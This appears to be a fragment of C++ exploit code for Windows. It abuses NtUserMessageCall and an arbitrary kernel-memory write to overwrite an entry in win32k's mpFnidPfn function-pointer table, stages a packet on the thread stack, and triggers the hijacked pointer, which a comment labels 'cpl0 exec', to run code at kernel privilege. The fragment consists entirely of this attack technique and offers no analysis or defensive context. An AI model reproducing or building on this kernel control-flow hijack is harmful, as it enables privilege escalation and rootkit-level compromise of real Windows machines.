__checkReturn void* ExAllocateRwePool( __in size_t size ) { return NtUserMessageCall(m_window->Hwnd(), size, 0, 0, 0, EX_ALLOCATE_POOL); }
__checkReturn bool DoEscape( __in const void* kernelImage, __inout extinterface::PACKET& packet ) { auto stack_base = GetCurrentThreadStackBase(); if (!stack_base) return false; void* ace = RELLOCATE(SystemMain, CDllModule::ModuleBase(), kernelImage); if (!m_io.Write(&m_win32k->mpFnidPfn()[UNUSED_IND + ACE - 1], &ace, sizeof(ace))) return false; if (!m_io.Write(static_cast<char*>(stack_base) - sizeof(packet), &packet, sizeof(packet))) return false; //cpl0 exec : (void)NtUserMessageCall(m_window->Hwnd(), DEFAULT_PARAM, 0, 0, 0, ACE); return true; }
__checkReturn void* GetCurrentThreadStackBase() { return NtUserMessageCall(m_window->Hwnd(), DEFAULT_PARAM, 0, 0, 0, PS_GET_CURRENT_THREAD_STACK_BASE); }